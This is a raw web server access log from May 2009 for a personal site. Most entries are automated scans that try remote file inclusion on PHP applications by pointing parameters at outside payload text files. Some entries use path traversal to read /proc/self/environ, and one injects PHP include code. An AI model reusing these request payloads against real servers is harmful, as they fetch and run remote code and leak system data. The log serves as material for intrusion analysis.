72.11.150.98 - - [20/May/2009:10:19:36 -0700] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 200 7987 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:53 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:53 -0700] "GET /logs/access_080131.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:53 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.0" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:10:19:53 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:20:06 -0700] "GET /logs/access_080331.log//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:20:06 -0700] "GET /logs//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 100339 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:20:08 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:10:20:24 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:20:53 -0700] "GET /?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 200 42099 "-" "Mozilla/5.0" "www.dmulk.com"
218.27.203.107 - - [20/May/2009:10:20:54 -0700] "GET /logs/access_071214.log//?_zb_path=http://livingfaithlutheran.com//snippetmaster/includes/tar_lib/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:21:15 -0700] "GET /logs/access_080809.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:21:15 -0700] "GET /logs/access_080219.log%20%20//modules/vwar/admin/admin.php?vwar_root=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.241.40.51 - - [20/May/2009:10:21:24 -0700] "GET /logs/access_080611.log%20%20//jscript.php?my_ms[root]=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.11.150.98 - - [20/May/2009:10:21:59 -0700] "GET /logs/access_081130.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://emokid01.fileave.com/Emo_Blodddy.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:22:32 -0700] "GET /logs/access_080518.log//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:22:33 -0700] "GET /ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:22:33 -0700] "GET /logs/access_080518.log//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:22:33 -0700] "GET /ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:22:33 -0700] "GET /logs//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:22:37 -0700] "GET /logs//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:46 -0700] "GET /e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:46 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:46 -0700] "GET /logs/access_080906.log/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:46 -0700] "GET /logs/access_081210.log/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:22:48 -0700] "GET /logs/access_080508.log//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:48 -0700] "GET /logs/access_080906.log/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:48 -0700] "GET /logs/access_081210.log/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:48 -0700] "GET /e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:22:48 -0700] "GET /logs/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:22:59 -0700] "GET /logs/access_080508.log//ashnews.php?pathtoashnews=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:23:16 -0700] "GET /logs/access_080918.log//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:23:16 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:23:17 -0700] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:47 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:47 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:47 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:47 -0700] "GET /logs/access_080614.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:47 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:47 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:48 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:48 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:48 -0700] "GET /logs/access_080614.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:48 -0700] "GET /modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:23:48 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
74.63.33.250 - - [20/May/2009:10:23:59 -0700] "GET /logs/access_081003.log/administrator/components/com_ricettario/admin.ricettario.php?mosConfig_absolute_path=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:24:07 -0700] "GET /logs/access_081116.log//modules/vwar/admin/admin.php?vwar_root=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:24:08 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:24:08 -0700] "GET /logs/access_081116.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
62.149.163.198 - - [20/May/2009:10:24:08 -0700] "GET /logs/access_081116.log//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:24:13 -0700] "GET /logs/access_080906.log%20%20/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:24:13 -0700] "GET /logs/access_081210.log%20%20/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:24:17 -0700] "GET /logs/access_080906.log%20%20/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [20/May/2009:10:24:17 -0700] "GET /logs/access_081210.log%20%20/e404.php?DOCUMENT_ROOT=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:24:32 -0700] "GET /logs/access_080918.log//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:24:32 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:24:33 -0700] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:24:34 -0700] "GET /logs/access_090506.log//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:24:34 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:10:24:34 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://chicken.ucoz.org/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:24:51 -0700] "GET /logs/access_080929.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:24:52 -0700] "GET /?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 8039 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:24:53 -0700] "GET /logs//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:24:56 -0700] "GET /logs/access_080929.log//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:24:58 -0700] "GET /?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 8039 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:10:24:59 -0700] "GET /logs//?view=page&pagename=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.805" "www.dmulk.com"
218.246.20.221 - - [20/May/2009:10:25:09 -0700] "GET /logs/access_071214.log///?_zb_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.246.20.221 - - [20/May/2009:10:25:09 -0700] "GET /logs///?_zb_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 200 100340 "-" "Mozilla/5.0" "www.dmulk.com"
188.98.68.154 - - [20/May/2009:10:25:28 -0700] "GET /xbbknnaalaaammdgm.php HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:10:25:34 -0700] "GET /logs/access_080329.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:38 -0700] "GET /arcade.php?phpbb_root_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:38 -0700] "GET /logs//arcade.php?phpbb_root_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:38 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:38 -0700] "GET /arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:39 -0700] "GET /arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
171.64.75.45 - - [20/May/2009:10:25:39 -0700] "GET /logs/access_080308.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:42 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:42 -0700] "GET /logs//arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:10:25:42 -0700] "GET /logs//arcade.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:25:54 -0700] "GET /logs/access_080425.log//?option=com_mosforms&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:25:56 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.43 - - [20/May/2009:10:25:56 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:26:00 -0700] "GET /logs//?option=com_mosforms&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.803" "www.dmulk.com"
218.246.20.221 - - [20/May/2009:10:26:04 -0700] "GET /logs/access_080331.log///?_zb_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:26:11 -0700] "GET /logs/access_080919.log//?option=com_mosforms&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:10:26:12 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:10:26:38 -0700] "GET /?option=com_mosforms&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.0" 200 42096 "-" "libwww-perl/5.803" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:29:50 -0700] "GET /logs/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:29:50 -0700] "GET /[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:29:50 -0700] "GET /logs/access_081230.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:29:50 -0700] "GET /logs/access_081020.log/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:29:51 -0700] "GET /logs/access_081230.log%20%20/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:10:29:51 -0700] "GET /logs/access_081020.log%20%20/[MyAlbum_DIR]/language.inc.php?langs_dir=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.122.26.5 - - [20/May/2009:10:30:24 -0700] "GET /logs/access_081108.log//naboard_pnr.php?skin=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:30:45 -0700] "GET /logs/access_080713.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:30:45 -0700] "GET /atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:30:46 -0700] "GET /logs//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:30:51 -0700] "GET /logs/access_080713.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.128.40 - - [20/May/2009:10:30:51 -0700] "GET /logs/access_081221.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:30:51 -0700] "GET /atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:30:52 -0700] "GET /logs//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:30:59 -0700] "GET /logs/access_080918.log//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:30:59 -0700] "GET /logs/access_081221.log//atom.php5?page=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:30:59 -0700] "GET /amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.135.14 - - [20/May/2009:10:31:01 -0700] "GET /logs//amember/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://badmintonblog.net/blog/personal/MADONGCMD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:31:20 -0700] "GET /logs/access_080630.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:31:20 -0700] "GET /logs/access_080808.log//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:31:20 -0700] "GET /logs/access_080808.log%20%20//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:31:20 -0700] "GET /logs/access_080630.log%20%20//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:31:20 -0700] "GET /msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:31:20 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.206.183.148 - - [20/May/2009:10:31:21 -0700] "GET /logs//msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
